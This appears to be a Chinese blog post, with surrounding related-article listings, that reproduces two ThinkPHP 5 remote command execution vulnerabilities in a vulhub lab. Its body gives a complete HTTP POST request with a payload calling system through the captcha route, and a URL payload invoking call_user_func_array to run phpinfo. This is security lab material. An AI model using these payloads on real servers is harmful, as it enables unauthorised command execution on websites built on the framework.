php 远程 执行,THINKPHP5 远程命令执行

最新推荐文章于 2023-03-09 16:49:55 发布
最新推荐文章于 2023-03-09 16:49:55 发布
阅读量300 收藏
点赞数
文章标签: php 远程 执行

漏洞背景

前台有回显RCE

框架介绍:ThinkPHP是一款运用极广的PHP开发框架。

漏洞引入:

1.其版本5中,由于没有正确处理控制器名,导致在网站没有开启强制路由的情况下(即默认情况下)可以执行任意方法,从而导致远程命令执行漏洞。

2.其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞。

漏洞特征

网站指纹

本地复现

thinkphp/5.0.23-rce

直接post就可以执行命令。。。。好无聊啊。。。

POST /index.php?s=captcha HTTP/1.1

Host: localhost

Accept-Encoding: gzip, deflate

Accept: */*

Accept-Language: en

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)

Connection: close

Content-Type: application/x-www-form-urlencoded

Content-Length: 72

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=id

thinkphp/5-rce

直接访问http://your-ip:8080/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1,即可执行phpinfo

总结

无聊的一天。。。

参考

vulhub:

https://github.com/vulhub/vulhub/blob/master/thinkphp/5.0.23-rce/README.zh-cn.md,

https://github.com/vulhub/vulhub/blob/master/thinkphp/5-rce/README.zh-cn.md

光影帽子
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Thinkphp-5-0远程代码执行漏洞1
08-03
Thinkphp-5-0远程代码执行漏洞1
ThinkPHP-request函数远程代码执行1
08-03
library/think/Request.php:541-603 isGet isPost isPut isDelete isHeadpublic funct
ThinkPHP5.0.23 远程代码执行漏洞
夜星空如海的博客
09-30 1815
ThinkPHP 是一款运用极广的 PHP 开发框架。其 5.0.23 以前的版本中,获取 method 的方法中没有正确处理方法名,导致攻击者可以调用 Request 类任意方法并构造利用链,从而导致远程代码执行漏洞。
ThinkPHP5远程命令执行漏洞
qq_45314073的博客
09-20 1987
thinkPHP5漏洞复现
PHP-CGI远程代码执行漏洞CVE-2012-1823漏洞复现
qq_29365787的博客
12-10 1120
一、漏洞介绍 这个漏洞简单来说,就是用户请求的querystring(querystring字面上的意思就是查询字符串,一般是对http请求所带的数据进行解析,这里也是只http请求中所带的数据)被作为了php-cgi的参数,最终导致了一系列结果。 影响范围: 漏洞影响版本 php < 5.3.12 or php < 5.4.2 PS:CVE-2012-1823是在php-cgi运行模式下出现的漏洞,其漏洞只出现在以cgi模式运行的php中 二、PHP运行的四种模式: 1)cgi 通用网关接口(
php 远程执行sh,ThinkPHP 5.* 远程命令执行漏洞复现与GETSHELL
weixin_35067976的博客
03-23 217
Thinkphp 下载地址:http://www.thinkphp.cn/donate/download/id/1125.html ThinkPHP5.0.15完整版本地环境搭建phpstudy ,在WWW根目录建立文件夹放入代码如果想要开启 debug 报错 在目录建立 文件里面的内容写: APP_DEBUG = true成功开启debug报错漏洞复现:漏洞exp: index...
ThinkPHP 5.0 远程代码执行漏洞分析
02-21
ThinkPHP 5.0 远程代码执行漏洞分析
从性能方面考虑PHP下载远程文件的3种方法
10-23
主要介绍了从性能方面考虑PHP下载远程文件的3种方法的相关资料,需要的朋友可以参考下
使用ThinkPHP自带的Http类下载远程图片到本地的实现代码
10-28
Thinkphp是国人开发一个PHP框架,该框架相比国外的一些框架也毫不逊色。强大的ORM,插件,分组等功能让人爱不释手。
ThinkPHP5.0使用命令执行代码逻辑
BoYou233的博客
07-23 1847
创建一个自定义命令类文件,新建application/common/command/Hello.php <?php namespace app\common\command; use think\console\Command; use think\console\Input; use think\console\input\Argument; use think\console\input\Option; use think\console\Output; use think\Db; cl
ThinkPHP5.0.21远程命令执行漏洞
ANYOUZHEN的博客
06-03 2207
漏洞出现的背景:从网上下载源码从网上搜索thinkphp5.0.21漏洞,发现存在远程命令执行漏洞ThinkPHP 5.0
实战-PHP远程代码执行漏洞
cainiao17441898的博客
07-19 632
环境搭建 搭建go语言环境 tar -C /usr/local -xzf go1.13.3.linux-amd64.tar.gz #解压go环境到常用命令的目录下 └─# echo “export PATH=$PATH:/usr/local/go/bin” > /etc/profile.d/go.sh 配置go.sh └─# source /etc/profile.d/go.sh #运行go.sh └─# go 下载使用漏洞的工具phuip-fpizdam: 修改goproxy代理地址,默认地址国内无
phpmoadmin 远程代码执行 (CVE-2015-2208)
qq_51459600的博客
03-02 3465
phpmoadmin 远程代码执行 (CVE-2015-2208) 描述: phpMoAdmin 是一个用PHP 开发的在线MongoDB 管理工具,可用于创建、删除和修改数据库和索引,提供视图和数据搜索工具,提供数据库启动时间和内存的统计,支持JSON 格式数据的导入导出。 moadmin.php 开头检查POST是否传输了object,随后内包含的if进行判断,这个过程即调用了当前类的saveObject方法,POST传入object参数的值带入eval后就造成了代码执行。 环境搭建 靶机:CentOS
thinkphp5命令行运行 控制器方法
qq_34605417的博客
03-09 408
thinkphp5命令行运行 控制器方法
ThinkPHP v5.x命令执行利用工具(可getshell)
热门推荐
Fly_鹏程万里
12-13 1万+
漏洞验证 命令执行 getshell 工具下载 https://download.csdn.net/download/fly_hps/10848910 免责声明 该工具只能授权验证网站漏洞和站长验证漏洞使用。 禁止用于未授权测试,非法入侵,否则一切后果自负,和作者无关...
php 远程 执行命令,远程以root权限执行php命令
weixin_35716518的博客
03-18 462
最近遇到一个来自开发组的需求:查询线上WEB服务器的PHP扩展模块版本号。由于web服务器较多,且权限不对开发组开放。所以只能用php写个程序,并用页面简单的展示下就OK了。线上有一台测试机。OK了。就用它做服务端了。在nginx配了个虚拟主机。实现思路:在测试机上远程连接到web服务器上,并执行php命令php支持这么干滴。。。这样可以免去每个web服务器上都要单独配置一个虚拟主机,放一个文件...
复现ThinkPHP5 5.0.23远程代码执行漏洞,并挂马
weixin_53872203的博客
02-25 1196
本文章仅供学习参考使用 (1)打开靶场 (2)使用工具searchsploit ,对Thinkphp进行漏洞扫描,发现remote Code Execution(远程代码执行漏洞) (3) 将改漏洞cp到tp.txt文件并查看 (4)查看thinkphp5 5.0.23的版本中发现了playload ...
linux最新漏洞thinkphp,thinkphp5.0.x最新命令执行漏洞复现及扫描脚本编写
weixin_36473855的博客
05-16 2371
8种机械键盘轴体对比本人程序员,要买一个写代码的键盘,请问红轴和茶轴怎么选?漏洞复现2019.1.11日,thinkphp官方再次公布了一个tp5代码执行漏洞影响范围:5.0.x ~ 5.0.23漏洞代码详情参考:https://blog.csdn.net/qq_29647709/article/details/86307859提示:经过测试5.0.0-5.0.20版本使用的payload与5....
命令执行漏洞——远程命令执行
weixin_54055099的博客
09-17 3706
命令执行漏洞之远程命令执行的基础操作
thinkphp3.2.3 远程执行
最新发布
09-07
ThinkPHP 3.2.3中,远程执行漏洞是指攻击者能够通过网络发送恶意请求,使得应用程序执行非预期的命令或代码。这可能导致严重的安全问题,例如获取敏感数据、修改数据库、操纵系统等。 为了防止远程执行漏洞的利用...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值